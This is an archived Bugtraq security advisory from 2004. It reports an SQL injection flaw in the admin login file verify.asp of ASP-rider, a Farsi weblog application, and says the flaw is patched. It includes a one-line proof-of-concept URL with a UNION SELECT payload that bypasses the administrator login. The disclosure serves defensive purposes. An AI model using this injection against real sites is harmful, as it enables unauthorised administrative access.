ASP-rider is vulnerable to sql injection attack

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ASP-rider is vulnerable to sql injection attack
From: shervin khaleghjou <oil_karchack@xxxxxxxxx>
Date: 15 Dec 2004 03:23:08 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


-------------------www.karchack.com--------------------------
-------------------www.karchack.net--------------------------


affected software decribtion :
asp-rider is a full farsi weblog written in asp
www.asp-rider.com

--------------------------------------
Vulnerabilities:
the file verify.asp in blogadmin folder is vulnerable to sql injection attack

-------------------------------------
proof of concept :
you can easily log in to the weblog administrator page by entering :
www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 
from tbl_users where ''='&password=1



-------------------------------------
this vulnerability is already patched.
www.karchack.com
www.karchack.net

Prev by Date: [Correction For]: Secure Network Operations SNOsoft Research Team [SRT2004-12-14-0322] Symantec LiveUpdate Advisory
Next by Date: [USN-38-1] Linux kernel vulnerabilities
Previous by thread: [Correction For]: Secure Network Operations SNOsoft Research Team [SRT2004-12-14-0322] Symantec LiveUpdate Advisory
Next by thread: [USN-38-1] Linux kernel vulnerabilities
Index(es):
- Date
- Thread